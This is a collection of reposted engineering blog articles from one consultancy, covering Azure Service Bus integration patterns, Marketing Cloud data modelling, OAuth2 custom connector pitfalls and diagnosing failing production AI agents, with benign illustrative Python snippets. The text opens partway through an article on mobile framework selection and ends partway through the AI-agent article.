Our mobile engineers are trained across all four stacks (FlutterFlow, React Native, Flutter native, and the native platforms). When a new project lands, we run a fit assessment that scores the project against each framework on the criteria above. The recommendation comes from the assessment, not from "what we happen to specialize in."
This sometimes means we recommend FlutterFlow when the founder expected React Native, or React Native when they expected Flutter. The conversation is occasionally awkward (founders have read articles, formed preferences) but it saves the months of rework that come from picking the wrong framework. We have done that rework on inherited projects often enough to know what it costs.
The cross-training is deliberate. A vendor who only knows FlutterFlow will recommend FlutterFlow. A vendor who only knows React Native will recommend React Native. The unbiased recommendation is the differentiator, and the only way to give it honestly is to be fluent across the options.
A simple decision tree
If you do not want to walk through the full matrix, the rough heuristic:
- MVP in under 16 weeks, standard CRUD screens, single brand or simple white-label → FlutterFlow
- 3+ year codebase, JavaScript team, frequent iteration with OTA → React Native
- Performance-critical, animation-heavy, or codebase needs to span iOS / Android / web → Flutter native
- Heavy platform-specific integration or your team is already native and shipping → Native
When in doubt, FlutterFlow for MVP, React Native for the production rebuild if you outgrow FlutterFlow's limits.
If you are picking a stack right now
If your team is debating mobile frameworks and the conversation is not converging, the issue is usually that nobody has put the project's specific constraints on the table next to eac

---
## Plugin + Azure Function + Service Bus: async integration at scale

> Published: 2026-05-24 02:51:45+00:00
> Source: https://dev.to/sapotacorp/plugin-azure-function-service-bus-async-integration-at-scale-4o2i
> wpnews: https://wpnews.pro/news/plugin-azure-function-service-bus-async-integration-at-scale

This article describes an enterprise integration pattern where a Dataverse plugin publishes a small metadata message to an Azure Service Bus Topic, rather than directly calling multiple downstream systems. Five independent Azure Function consumers then subscribe to the topic, each handling its own destination (ERP, search, Power BI, notifications, data lake) with independent retry, dead-lettering, and idempotency logic. This architecture ensures that a failure in one downstream system does not affect the others, improving reliability at scale.

A Dataverse row changes. Five downstream systems need to know: an ERP that tracks financials, a search service that indexes the record, a Power BI dataset that feeds executive dashboards, a notification queue that messages field reps on mobile, and a data lake for analytics retention.
The junior version of this is a single async plugin that calls all five from the same post-operation step. It works in development. In production, it fails the first time any one of the five has a bad afternoon - the plugin step errors, retries ten times, fills the System Jobs queue, and operators get paged.
The pattern we ship at enterprise scale is different: the plugin's only job is to publish a message to Azure Service Bus. Five independent consumers pull from that message topic and handle their respective destinations. Each consumer retries, dead-letters, and monitors independently. The plugin never calls out to anything but the Service Bus topic.
Here is the architecture, the code, the failure semantics, and the six months of real-production experience that shaped it.
The architecture
A Topic (not a Queue) because the same event feeds multiple subscribers. Subscriptions filter so each consumer only sees events it cares about. Dead-letter per subscription, not global - the ERP and search services can fail independently without cross-contaminating.
Stage 1: the plugin
The plugin is small on purpose. Every line is a potential failure point; the less it does, the more reliable it is.
Three key decisions:
- Payload is metadata, not the full row. The message includes the entity name, ID, and which attributes changed. Consumers fetch the full row if they need it. Messages stay small (sub-1KB), which Service Bus charges less for and which avoids the edge case of payloads exceeding message size limits.
- CorrelationId from the plugin context. Every log entry and every downstream message carries the same correlation ID, making cross-system tracing possible with one query.
- Subject field for filtering. Subscribers filter on Subject LIKE 'account.%' or Subject = 'order.Update'. Subject-based filtering is cheap server-side; body-based filtering is more expensive.
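The three decisions above can be sketched as a small message envelope. This is a minimal illustration rather than the plugin's actual code (which would be C#): the class name, field names, and the way the MessageId is derived are all assumptions made for the example. The MessageId is computed deterministically so that a retried publish carries the same ID.

```python
import json
import uuid
from dataclasses import dataclass


@dataclass
class ChangeEvent:
    """Metadata-only event. Field names are illustrative, not the article's schema."""
    entity: str                     # e.g. "order"
    record_id: str                  # Dataverse row ID
    operation: str                  # e.g. "Update"
    changed_attributes: list[str]   # attribute names only, never the values
    correlation_id: str             # taken from the plugin execution context

    @property
    def subject(self) -> str:
        # "<entity>.<operation>", the shape filters like Subject = 'order.Update' expect
        return f"{self.entity}.{self.operation}"

    @property
    def message_id(self) -> str:
        # Assumption: a deterministic ID, so a plugin retry produces the same MessageId
        name = f"{self.correlation_id}:{self.entity}:{self.record_id}:{self.operation}"
        return str(uuid.uuid5(uuid.NAMESPACE_URL, name))

    def body(self) -> bytes:
        payload = {
            "entity": self.entity,
            "id": self.record_id,
            "changed": self.changed_attributes,
        }
        return json.dumps(payload, separators=(",", ":")).encode("utf-8")


event = ChangeEvent(
    entity="order",
    record_id="00000000-0000-0000-0000-000000000001",
    operation="Update",
    changed_attributes=["statuscode", "totalamount"],
    correlation_id="11111111-1111-1111-1111-111111111111",
)
print(event.subject, len(event.body()), "bytes")
```

Consumers that need more than the changed attribute names fetch the row themselves, which is what keeps the body well under 1KB.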
Stage 2: Service Bus Topic configuration
Topic-level settings:
- Max message size: 1MB (default). Our payloads are ~500 bytes, nowhere near the limit.
- Message time-to-live: 7 days. Long enough to survive a weekend outage, short enough that stale messages don't haunt the system.
- Duplicate detection: enabled with 10-minute window. If the same MessageId arrives twice within 10 minutes, the second is dropped. This guards against plugin retries causing duplicate downstream processing.
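To make the duplicate-detection window concrete, here is a toy in-memory model of the behaviour described above. It is not Service Bus code and does not call any Azure API; the class and method names are hypothetical, and the real broker's bookkeeping may differ in detail.

```python
from datetime import datetime, timedelta


class DuplicateDetector:
    """Toy model of a duplicate-detection window keyed by MessageId."""

    def __init__(self, window: timedelta) -> None:
        self.window = window
        self._seen: dict[str, datetime] = {}

    def accept(self, message_id: str, now: datetime) -> bool:
        """Return True if the message is kept, False if it is dropped as a duplicate."""
        # Forget IDs whose window has already elapsed.
        self._seen = {m: t for m, t in self._seen.items() if now - t < self.window}
        if message_id in self._seen:
            return False
        self._seen[message_id] = now
        return True


t0 = datetime(2026, 1, 1, 12, 0, 0)
detector = DuplicateDetector(window=timedelta(minutes=10))
first = detector.accept("msg-1", t0)                          # kept
retry = detector.accept("msg-1", t0 + timedelta(minutes=5))   # inside the window: dropped
late = detector.accept("msg-1", t0 + timedelta(minutes=11))   # window elapsed: kept again
```

The model also shows why the window length matters: a retry that arrives after the window has closed is treated as a new message, so the consumers' own idempotency check remains the last line of defence.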
Subscription-level settings per subscriber:
- Filter rule: SQL-like expression on message properties (Subject, custom headers).
- Max delivery count: 5 (same reasoning as in the simpler Service Bus pattern).
- Lock duration: tuned to each consumer's processing time. The ERP consumer, which makes a remote call taking up to 30 seconds, has a 60-second lock. The search consumer, which is purely in-Azure and takes 1-2 seconds, has a 30-second lock.
Stage 3: the consumers
Each subscriber is an Azure Function with a Service Bus Topic subscription trigger. They share a common frame but implement different downstream logic.
Common frame:
The idempotency store is either Cosmos DB with TTL or Redis. Every successfully processed MessageId is recorded. The TTL matches the message time-to-live on the Topic plus a safety margin.
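The idempotency check in that frame can be sketched as follows. This is an in-memory stand-in, assuming a simple seen/record interface; the names `IdempotencyStore` and `handle` are hypothetical, and a real consumer would back the store with Cosmos DB or Redis as described above.

```python
import time
from typing import Callable


class IdempotencyStore:
    """In-memory stand-in for the Cosmos DB or Redis store; entries expire after a TTL."""

    def __init__(self, ttl_seconds: float, clock: Callable[[], float] = time.monotonic) -> None:
        self.ttl_seconds = ttl_seconds
        self._clock = clock
        self._expires_at: dict[str, float] = {}

    def seen(self, message_id: str) -> bool:
        expiry = self._expires_at.get(message_id)
        return expiry is not None and expiry > self._clock()

    def record(self, message_id: str) -> None:
        self._expires_at[message_id] = self._clock() + self.ttl_seconds


def handle(message_id: str, store: IdempotencyStore, process: Callable[[], None]) -> str:
    """Skip already-processed messages; record the ID only after success."""
    if store.seen(message_id):
        return "skipped"
    process()  # an exception here leaves the ID unrecorded, so a redelivery retries
    store.record(message_id)
    return "processed"


# TTL = 7-day message time-to-live plus a 1-day safety margin (the margin is an assumption).
store = IdempotencyStore(ttl_seconds=8 * 24 * 3600)
calls: list[str] = []
first = handle("msg-1", store, lambda: calls.append("erp"))
second = handle("msg-1", store, lambda: calls.append("erp"))
```

Recording the ID after the downstream call, not before, trades a small chance of a repeated call for the guarantee that a failed attempt is never marked as done.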
Core logic per consumer is where the differences live:
- ERP consumer: fetches the full Dataverse row via Web API (using a managed identity), maps to the ERP's schema, calls the ERP API with an idempotency key derived from MessageId.
- Search consumer: fetches the row, calls the search service's indexing API.
- Power BI consumer: triggers a dataset partition refresh; uses the correlation ID to tag the refresh operation.
- Notification consumer: looks up which users to notify based on the row's owner and policy, sends via the notification service.
- Data lake consumer: appends a compressed JSON record to an ADLS Gen2 path partitioned by date.
Observability
The chain is not useful in production without observability. Our setup:
- Application Insights per Function App, with a shared workspace so queries span functions.
- Every log entry includes CorrelationId and MessageId via the BeginScope pattern in the common frame.
- Custom metrics: ProcessedMessages, FailedMessages, DeadLetteredMessages, ProcessingDuration.
- Dashboards (Azure Monitor workbooks):
  - End-to-end latency per event type (from Dataverse change timestamp to final destination write).
  - Dead-letter queue depth per consumer.
  - Error rate per consumer, per hour.
- Alerts: DLQ depth > 10 for any consumer, processing duration p95 > SLA for any consumer.
The end-to-end trace for a single event: a KQL query across Application Insights joining by CorrelationId. One row change in Dataverse, traced through plugin → Service Bus publish → each consumer → each downstream call. When something fails, we know exactly where in the chain.
Six months in production: the numbers
A client with:
- 50,000 Dataverse events per day
- 5 consumers averaging 3 seconds processing each
- Bursts to 500 events/minute during peak hours
Current state:
- P50 end-to-end latency (event → all consumers complete): 4.2 seconds
- P95 end-to-end latency: 11 seconds
- Dead-letter rate: 0.003% (one in 33,000 messages)
- Consumer error rate: 0.1-0.2% (mostly transient, auto-retried)
- Monthly Azure cost (Service Bus + Function Apps + Application Insights): ~$320
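A quick back-of-the-envelope check puts those figures in proportion. The inputs are the numbers quoted above; the only assumption is that the dead-letter rate applies per delivery (one delivery per consumer per event), which the article does not state explicitly.

```python
events_per_day = 50_000
consumers = 5
peak_events_per_minute = 500
dead_letter_rate = 0.003 / 100  # 0.003% expressed as a fraction

average_events_per_minute = events_per_day / (24 * 60)
peak_to_average = peak_events_per_minute / average_events_per_minute
deliveries_per_day = events_per_day * consumers
messages_per_dead_letter = 1 / dead_letter_rate
# Assumption: the rate is per delivery, not per source event.
dead_letters_per_day = deliveries_per_day * dead_letter_rate

print(f"average load:      {average_events_per_minute:.1f} events/min")
print(f"peak vs average:   {peak_to_average:.1f}x")
print(f"deliveries/day:    {deliveries_per_day}")
print(f"one dead letter per {messages_per_dead_letter:.0f} messages")
print(f"dead letters/day:  {dead_letters_per_day:.1f}")
```

The peak is roughly fourteen times the daily average, which is the gap the topic absorbs as a buffer, and the dead-letter volume stays at a handful of messages per day, small enough for a human to review.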
What we tuned after launch
Ratio of Function App instances to queue depth. Consumption plan auto-scales; the defaults were conservative. We adjusted maxConcurrentCalls per function to keep consumer processing near its per-instance capacity before spinning up more instances.
Filter rules on subscriptions. Initially each consumer received every event and filtered in code. Moving the filter to the subscription level (server-side) cut consumer costs by ~60% because consumers no longer woke up for irrelevant events.
Deduplication window. Initial 1-minute window was too short; plugin retries occasionally pushed duplicates more than a minute apart. Extended to 10 minutes after measuring actual retry intervals.
When not to ship this
This pattern is overkill for:
- Projects with one or two downstream consumers - a direct Power Automate flow is simpler.
- Low-volume scenarios (< 1000 events/day) - the operational complexity outweighs the throughput benefit.
- Teams without Azure experience - maintaining Service Bus, Function Apps, and Application Insights is a real ops burden. Pick a simpler pattern until the operational muscle exists.
For the projects where it fits (enterprise-scale, multi-consumer, event-critical), this is the architecture we reach for first. It survives load, it surfaces failures cleanly, and when something goes wrong, the fix is almost always in a known location with clear visibility.

---
## SFMC Data Model and Cardinality: Wire DEs Together Without Regret

> Published: 2026-05-24 02:51:40+00:00
> Source: https://dev.to/sapotacorp/sfmc-data-model-and-cardinality-wire-des-together-without-regret-21l
> wpnews: https://wpnews.pro/news/sfmc-data-model-and-cardinality-wire-des-together-without-regret

The article explains that a common mistake in Salesforce Marketing Cloud (SFMC) is creating Data Extensions (DEs) reactively, leading to an unjoinable data sprawl. It recommends a proactive approach: first define a Database of Record (DBOR) and a stable Subscriber Key, then structure DEs using a Master/Spoke model with correct cardinality (1:1, 1:Many, Many:Many) to enable effective cross-data segmentation. Proper data modeling, documented and signed off before building, is presented as the most critical step to avoid costly remediation later.

Teams new to SFMC create Data Extensions as requirements arrive. Today's send needs a list, tomorrow's loyalty feature needs a separate DE, next week's CRM sync adds three more. Three months in: 20 DEs, nothing can be joined, no cross-data segmentation works, no audit trail.
The fix is 30 minutes on a whiteboard before the first DE exists. Two concepts carry it: Database of Record and Cardinality.
The DBOR is the single source of truth for subscriber identity. Every other data source points at it.
Discovery question for the client:
One answer. If the client says "all of them," help them decide - usually by picking the system that currently drives business operations (order fulfillment, customer service queries).
The DBOR defines the Subscriber Key. All SFMC DEs that hold subscriber data use an ID that maps back to the DBOR.
Once DBOR is decided, the Subscriber Key follows:
The Subscriber Key must be stable - never changes over a customer's lifetime. Email addresses change; Shopify IDs can reset on a store migration; a purpose-built CustomerID is safest.
Document the Subscriber Key rule in the data model doc. When new data sources arrive later, they get plumbed through the same Subscriber Key.
Rather than one giant DE with every column, split by function:
Master holds the subscriber-facing attributes. Spokes hold the detail. Joins happen via AMPscript Lookup or Automation Studio SQL, not by duplicating columns.
When you link DEs in Contact Builder for cross-DE segmentation, SFMC asks about cardinality - the relationship between two DEs:
| Cardinality | Meaning | Example |
| --- | --- | --- |
| 1:1 | One row in A relates to one row in B | Customer -> primary Address (each customer has one primary) |
| 1:Many | One row in A relates to many rows in B | Customer -> Orders (one customer, many orders) |
| Many:Many | Many rows in A relate to many in B | Customer -> Product (via Order_Items - each customer can buy many products, each product bought by many) |
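A small runnable sketch of the Master/Spoke split and a 1:Many join, using SQLite through Python as a stand-in for Automation Studio SQL. The table and column names (`Customer_Master`, `Orders`, `SubscriberKey`) are illustrative assumptions, and SFMC's SQL dialect differs from SQLite's in places.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE Customer_Master (SubscriberKey TEXT PRIMARY KEY, EmailAddress TEXT);
    CREATE TABLE Orders (OrderId TEXT PRIMARY KEY, SubscriberKey TEXT, Total REAL);

    INSERT INTO Customer_Master VALUES ('C001', 'ana@example.com'), ('C002', 'ben@example.com');
    INSERT INTO Orders VALUES ('O1', 'C001', 40.0), ('O2', 'C001', 75.0), ('O3', 'C002', 20.0);
    """
)

# 1:Many join: one master row fans out to many order rows, so aggregate per
# subscriber to get back to one row per customer before segmenting.
rows = conn.execute(
    """
    SELECT m.SubscriberKey, m.EmailAddress, COUNT(o.OrderId) AS OrderCount, SUM(o.Total) AS Spend
    FROM Customer_Master AS m
    JOIN Orders AS o ON o.SubscriberKey = m.SubscriberKey
    GROUP BY m.SubscriberKey, m.EmailAddress
    ORDER BY m.SubscriberKey
    """
).fetchall()

for row in rows:
    print(row)
```

Without the GROUP BY, customer C001 would appear twice in the result, which is the kind of duplication a wrongly declared 1:1 relationship hides until a send goes out.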
Getting cardinality wrong breaks segmentation:
Before touching SFMC for a new engagement, we write a one-page data model:
Review with the client. Once signed off, building in SFMC follows the doc rather than the other way around.
When picking up a poorly-modeled SFMC account, the symptoms are predictable:
The remediation is the same whether you're starting fresh or remodeling: define DBOR, fix Subscriber Key, introduce a Master DE, migrate downstream.
Data modeling doesn't feel productive because you're not building anything yet. On SFMC engagements it's the most leveraged hour of the whole project. Write the data model doc, get client sign-off, then build. The alternative is the 20-DE sprawl that eats your Q2.

---
## Custom connector with OAuth2: three auth pitfalls we debugged

> Published: 2026-05-24 02:51:34+00:00
> Source: https://dev.to/sapotacorp/custom-connector-with-oauth2-three-auth-pitfalls-we-debugged-4758
> wpnews: https://wpnews.pro/news/custom-connector-with-oauth2-three-auth-pitfalls-we-debugged

The article describes three common pitfalls encountered when building a custom Power Automate connector using OAuth2 for a third-party API. The issues included a redirect URI mismatch between Power Platform environments, a failure to refresh tokens because the `refreshUrl` was not explicitly configured in the connector's OpenAPI schema, and the inability to send non-standard parameters (like a tenant ID) during the token exchange. The authors provide specific fixes, such as registering multiple redirect URLs and explicitly setting the refresh URL, while noting that some provider-specific behaviors require workarounds like using an Azure Function.

A client uses a third-party logistics API that is not in Power Automate's built-in connector catalog. The API speaks OAuth2 authorization code flow. The platform has a "Create a custom connector" flow that claims to handle OAuth2 in a couple of clicks. The first two connectors we built this way worked. The third hit three separate issues that took a combined week to diagnose.
Here is what those three were, and the patterns we now check up-front on every OAuth2 custom connector.
You fill in a form with:
The platform handles the rest: redirect the user through consent, capture the authorization code, exchange it for an access token, refresh when expired. When a flow uses the connector, the current access token is injected into the Authorization header automatically.
This works when the identity provider follows the OAuth2 spec faithfully. It breaks in ways the platform does not surface clearly when the provider takes any of the common non-spec shortcuts.
You configured the logistics API's OAuth app with a redirect URL copied from your Dev environment. The Dev custom connector works. You export the solution to UAT, import it, and the first OAuth consent in UAT fails with "redirect_uri_mismatch."
Root cause: Power Platform generates a redirect URL that includes the environment-specific tenant subdomain. The URL from Dev is not the URL from UAT.
Fix: register multiple redirect URLs in the identity provider, one per Power Platform environment. The OAuth app on the IdP side needs an entry for every https://global.consent.azure-apim.net/redirect/* URL that corresponds to your environments.
Complication: some identity providers allow wildcards in redirect URL registration (https://global.consent.azure-apim.net/redirect/*), others do not. For the strict ones, you maintain a list and add/remove entries when environments come and go.
The API you are connecting to issues access tokens valid for 1 hour and refresh tokens valid for 30 days. Power Platform should refresh the access token automatically when it expires; you should not need to re-authorize for 30 days.
What happened: every 2 hours, the flow started failing with 401 Unauthorized. Manual reauthorization of the connection fixed it; 2 hours later, same failure.
Diagnosis took a while. The flow's run history showed the token being used, the API rejecting it, but no refresh attempt. We eventually traced it to how the connector was declaring its refresh behavior in the OpenAPI schema: the connector had no refreshUrl configured, so the platform treated every token as final and never attempted a refresh.
Fix: set the refreshUrl explicitly in the connector's security section, even if it is the same as the token URL. Without it, the platform assumes no refresh is supported.
A secondary issue we found: some APIs rotate the refresh token on every refresh (return a new refresh token alongside the new access token). Power Platform handles this correctly if the response includes refresh_token in the JSON. APIs that only include refresh_token on the initial grant and not on refresh will eventually expire the stored refresh token, and re-authorization becomes necessary. This is a provider behavior you cannot fix in the connector - you can only schedule manual re-auth before the refresh token's lifetime runs out.
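The difference between rotating and non-rotating providers comes down to how a refresh response is merged into the stored tokens. The sketch below is a generic illustration, not Power Platform's internal logic; `TokenSet` and `apply_refresh_response` are hypothetical names, and the one-hour default for a missing `expires_in` is an assumption taken from the token lifetime mentioned above.

```python
from dataclasses import dataclass


@dataclass
class TokenSet:
    access_token: str
    refresh_token: str
    access_expires_at: float  # epoch seconds


def apply_refresh_response(current: TokenSet, response: dict, now: float) -> TokenSet:
    """Merge a token-endpoint refresh response into the stored tokens."""
    return TokenSet(
        access_token=response["access_token"],
        # Rotating providers return a new refresh_token. Others omit it, in which
        # case the stored one is kept and keeps aging toward its original expiry.
        refresh_token=response.get("refresh_token", current.refresh_token),
        access_expires_at=now + float(response.get("expires_in", 3600)),
    )


stored = TokenSet(access_token="a1", refresh_token="r1", access_expires_at=1000.0)
rotated = apply_refresh_response(
    stored, {"access_token": "a2", "refresh_token": "r2", "expires_in": 3600}, now=2000.0
)
kept = apply_refresh_response(stored, {"access_token": "a3"}, now=2000.0)
```

In the second case the refresh token never changes, so its 30-day clock started at the original consent and cannot be extended from the client side.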
Standard OAuth2 token exchange sends grant_type=authorization_code, code=, redirect_uri=, etc. in the form body.
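As a rough sketch, the form body for that exchange can be built like this. The function name and the `extra` argument are hypothetical; `extra` exists only to show where provider-specific, non-standard fields would have to go when code you control performs the exchange. Sending client credentials in the body is one of the options the OAuth2 spec permits; some providers expect HTTP Basic authentication instead.

```python
from typing import Mapping, Optional
from urllib.parse import urlencode


def token_request_body(
    code: str,
    redirect_uri: str,
    client_id: str,
    client_secret: str,
    extra: Optional[Mapping[str, str]] = None,
) -> str:
    """Build the application/x-www-form-urlencoded body for an authorization-code exchange."""
    fields = {
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "client_secret": client_secret,
    }
    # Provider-specific additions (non-standard) go last and cannot override spec fields.
    for key, value in (extra or {}).items():
        fields.setdefault(key, value)
    return urlencode(fields)


standard = token_request_body("abc123", "https://example.com/cb", "client", "secret")
with_extra = token_request_body(
    "abc123", "https://example.com/cb", "client", "secret", extra={"tenant_id": "t-42"}
)
```

The body would be POSTed to the provider's token URL with a `Content-Type` of `application/x-www-form-urlencoded`.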
The API we were connecting to wanted an additional tenant_id parameter on every token exchange. It is not part of the spec; the provider added it for their multi-tenant SaaS model.
Power Platform's custom connector OAuth2 configuration does not have a field for "extra parameters to send on token exchange." Default behavior sends only the spec-defined fields.
The fix we used was hacky: move the OAuth flow behind an Azure Function. The flow calls the function's HTTPS endpoint, the function does the token exchange with the full set of parameters and returns the access token, and the flow uses the access token via a separate connector that expects Bearer auth. This doubled the integration complexity (an extra hop, an extra resource to monitor) but was the only working path. We later migrated to a direct connector when the API provider added spec-compliant OAuth as an option.
The broader lesson: before building a custom connector with OAuth2, confirm the target API follows OAuth2 strictly enough to work in the platform's constrained configuration. Providers that require custom token exchange parameters, non-standard response fields, or DPoP/mTLS cannot use the built-in OAuth2 flow - and the connector wizard does not warn you.
## The pre-check we run before building an OAuth2 connector
Ten minutes of reading provider docs before clicking "New custom connector" saves hours later. Our checklist:
1. Does the provider document the authorize URL, token URL, and refresh URL? (All three needed; "refresh works same as token" is the common case but confirm.)
2. Does the provider accept wildcard or multiple redirect URLs, or only one? (If only one, you need an extra OAuth app per environment.)
3. Does the provider rotate refresh tokens on refresh, and what are the lifetimes? (Shorter refresh lifetime means more re-auth pain.)
4. Does the token exchange require any parameters beyond the OAuth2 standard set? (If yes, you likely need an Azure Function proxy.)
5. Does the API require PKCE? (Power Platform supports it for some flows; confirm.)
Any "no, not sure" on these is a reason to de-risk before committing the full integration.
## The connection reference hygiene
A custom connector deployed to a managed solution uses connection references for per-environment auth. One connector, one connection reference, N connections (one per environment, each bound to its own OAuth authorization).
For the auth to actually carry across environments:
- Create a long-lived connection per env at initial setup (authorize once, test works)
- Ship the connection ID in the deployment-settings.json for each env
- Rotate/reauthorize only when the refresh token lifetime runs out
A connection reference that is re-bound mid-release will break every running flow. We now treat OAuth-backed connection references as nearly immutable - rebinding is an ops event, planned, communicated.
## The fourth pitfall we almost had
On a subsequent project, we almost repeated a mistake: committing an OAuth client secret into the deployment-settings file. The file is in git. The secret would have been in git history forever.
Pattern we now enforce: OAuth client secrets live in Azure Key Vault. A secret-type environment variable references the Key Vault secret URI. The deployment-settings file references only the env variable schema name, not the secret value. Git gets the schema name; Key Vault gets the secret; nothing sensitive lives in git.
Four pitfalls, one prevention pattern each. Built into the project template, the custom-connector work that used to eat weeks now takes days.

---
## Four forensics when a production AI agent fails

> Published: 2026-05-24 02:51:28+00:00
> Source: https://dev.to/sapotacorp/four-forensics-when-a-production-ai-agent-fails-4in2
> wpnews: https://wpnews.pro/news/four-forensics-when-a-production-ai-agent-fails

The article describes a common failure pattern in production AI agents, where multiple distinct issues—such as degraded external dependencies, faulty validation gates, and cost spikes from specific user queries—compound to appear as a single "broken agent" problem. It outlines a forensic approach using traces to diagnose these failures, citing a real case where an LLM provider's quiet model update increased agent iterations and latency, while permissive validation thresholds and a few high-cost users further degraded performance. The recommended fixes include tightening prompts, adjusting validation thresholds, and implementing per-user cost caps.

A founder messaged us at 11pm on a Friday: "Our agent is broken. Customers are complaining. My on-call engineer has no idea where to start. Can you help?"
The agent was a customer support tool that had launched the previous Monday. By Friday evening, the company's support inbox had filled with users reporting that the AI was giving wrong answers, taking forever to respond, or just timing out. The engineering team was treating it as one big problem. It was actually four problems stacked on top of each other.
This is the failure pattern most production agent teams hit at some point. The symptoms compound, the team panics, and they start trying random fixes. Here is the forensics order Sapota walks through, and the four most common failure modes that account for the majority of post-launch incidents.
Before debugging anything else, look at the traces. If your agent is in production without traces, that is the first problem to solve, even mid-incident. Pull a request that is failing, look at the trace, and see where the time is being spent and what is failing.
The pattern we look for in the trace:
In the founder's case, the traces showed three different failure patterns appearing in the same week. The team had been treating them as one problem because the customer-facing symptom was the same: "the AI is broken."
The most common production agent failure is an external dependency getting slower or less reliable. The agent itself is fine; the world around it changed.
Common culprits:
The diagnostic: check your tool latency and error metrics for the past week. If any tool's p95 latency is 2x what it was at launch, or its error rate is up more than 1%, that is the candidate.
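That check is easy to automate. The sketch below uses a nearest-rank p95 and reads "up more than 1%" as an absolute rise of one percentage point, which is an interpretation rather than something the rule above spells out; the function names are hypothetical.

```python
def p95(samples: list[float]) -> float:
    """Nearest-rank 95th percentile."""
    if not samples:
        raise ValueError("no samples")
    ordered = sorted(samples)
    rank = (95 * len(ordered) + 99) // 100  # ceil(0.95 * n) in integer arithmetic, 1-based
    return ordered[rank - 1]


def is_suspect(
    baseline_latencies: list[float],
    current_latencies: list[float],
    baseline_error_rate: float,
    current_error_rate: float,
) -> bool:
    """Flag a tool whose p95 latency doubled or whose error rate rose by over one point."""
    latency_regressed = p95(current_latencies) >= 2 * p95(baseline_latencies)
    # Assumption: "up more than 1%" means more than 0.01 in absolute terms.
    errors_regressed = (current_error_rate - baseline_error_rate) > 0.01
    return latency_regressed or errors_regressed


launch_week = [float(ms) for ms in range(1, 101)]   # synthetic latencies, 1..100 ms
this_week = [2 * ms for ms in launch_week]          # every call twice as slow
print(is_suspect(launch_week, this_week, baseline_error_rate=0.01, current_error_rate=0.01))
```

Running it per tool against the launch-week baseline gives a short list of candidates before anyone opens a trace.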
The fix depends on the specific dependency. Rate limits: upgrade your tier or implement exponential backoff. Slow retrieval: tune the index or scale the database. API drift: update the integration. KB growth: re-tune chunking and retrieval parameters.
In the founder's case, the LLM provider had pushed a quiet model update on Wednesday. The new model interpreted the routing prompt slightly differently, causing the agent to loop more often before settling on an answer. Average iterations went from 2.3 to 4.1. Cost and latency both jumped. The fix was a tighter routing prompt with three more few-shot examples.
The opposite failure: a validation gate is supposed to be catching bad outputs, but it is not firing because the gate logic has a bug or the threshold is wrong.
Common patterns:
The diagnostic: look at a sample of bad responses customers reported. Trace what should have caught them. If a validation gate exists for that failure mode, check whether it actually fired.
In the founder's system, the faithfulness threshold was set at 0.7, which was permissive. We tightened it to 0.85, the rejection rate went from 2% to 9%, and the customer complaints about wrong answers dropped immediately. The "rejected" responses were replaced with honest "I cannot find that in our knowledge base" messages, which users preferred to wrong answers.
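A threshold gate of this kind is only a few lines. The sketch assumes a faithfulness score between 0 and 1 is already computed upstream; how it is computed is outside the example, and the function names are hypothetical. The second helper estimates how a threshold change would move the rejection rate on a sample of past scores before it is deployed.

```python
FALLBACK = "I cannot find that in our knowledge base."


def gate(answer: str, faithfulness: float, threshold: float = 0.85) -> str:
    """Return the answer only if its faithfulness score clears the threshold."""
    return answer if faithfulness >= threshold else FALLBACK


def rejection_rate(scores: list[float], threshold: float) -> float:
    """Fraction of responses the gate would reject at a given threshold."""
    if not scores:
        return 0.0
    return sum(score < threshold for score in scores) / len(scores)


sample_scores = [0.60, 0.75, 0.80, 0.90]  # synthetic scores for illustration
print(rejection_rate(sample_scores, 0.70), rejection_rate(sample_scores, 0.85))
```

Replaying logged scores through `rejection_rate` at the old and new thresholds shows the cost of tightening the gate in advance, instead of discovering it in production.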
Production query distribution is different from test distribution. Specific query patterns can be much more expensive than the average, and a few of those can dominate the bill.
The pattern: a small fraction of users (often 1-5%) generate a large fraction of cost (often 30-60%). Either through legitimate complex queries, abuse, or because their input triggers a degenerate code path in the agent.
The diagnostic: pull cost-per-user statistics for the last week. Sort descending. Look at the top 10 users. Are they sending normal queries? Or is one user looping their integration with bad inputs? Or is a specific query class (long documents, malformed input, multi-turn deep into rare topics) eating budget?
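The ranking step can be sketched like this, assuming usage records are available as (user, cost) pairs; the record shape and function name are assumptions for the example.

```python
from collections import defaultdict


def top_spenders(usage: list[tuple[str, float]], n: int = 10) -> list[tuple[str, float, float]]:
    """Return (user, cost, share_of_total) for the n most expensive users."""
    per_user: dict[str, float] = defaultdict(float)
    for user, cost in usage:
        per_user[user] += cost
    total = sum(per_user.values())
    ranked = sorted(per_user.items(), key=lambda item: item[1], reverse=True)[:n]
    return [(user, cost, cost / total if total else 0.0) for user, cost in ranked]


# Synthetic week of usage: one user dominates the bill.
usage = [("a", 1.0), ("b", 6.0), ("a", 1.0), ("c", 2.0)]
for user, cost, share in top_spenders(usage):
    print(f"{user}: ${cost:.2f} ({share:.0%} of total)")
```

The share column is what matters: a single user at a large fraction of total spend is worth a manual look at their recent traces.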
The fixes vary:
In the founder's system, two users were sending repeated multi-paragraph product comparison requests, generating about 40% of the daily cost between them. We added a per-user daily cost cap and a length limit on inputs. Cost dropped 35% within 48 hours. Neither user complained because both were testing internal features and the cap was generous enough for normal use.
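A per-user daily cap combined with an input length limit could look like the sketch below. It is an in-memory illustration under assumed names and limits; a production version would persist spend in a shared store so that every agent instance sees the same totals.

```python
from collections import defaultdict
from datetime import date


class DailyCostCap:
    """Tracks spend per user per day and refuses requests once the cap is reached."""

    def __init__(self, cap_usd: float, max_input_chars: int) -> None:
        self.cap_usd = cap_usd
        self.max_input_chars = max_input_chars
        self._spend: dict[tuple[str, date], float] = defaultdict(float)

    def allow(self, user: str, text: str, today: date) -> bool:
        # Reject over-long inputs before they cost anything.
        if len(text) > self.max_input_chars:
            return False
        return self._spend[(user, today)] < self.cap_usd

    def record(self, user: str, cost_usd: float, today: date) -> None:
        self._spend[(user, today)] += cost_usd


cap = DailyCostCap(cap_usd=1.0, max_input_chars=2000)  # limits are placeholders
day = date(2026, 1, 5)
before = cap.allow("user-1", "compare plan A and plan B", day)
cap.record("user-1", 1.2, day)
after = cap.allow("user-1", "compare plan A and plan B", day)
```

Keying the spend on (user, date) means the cap resets on its own the next day without a cleanup job.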
The hardest failure to detect: nothing is broken, no errors, latency is fine, cost is normal. But the responses are getting worse. Customers complain, the team cannot reproduce, and the dashboards all look green.
Causes:
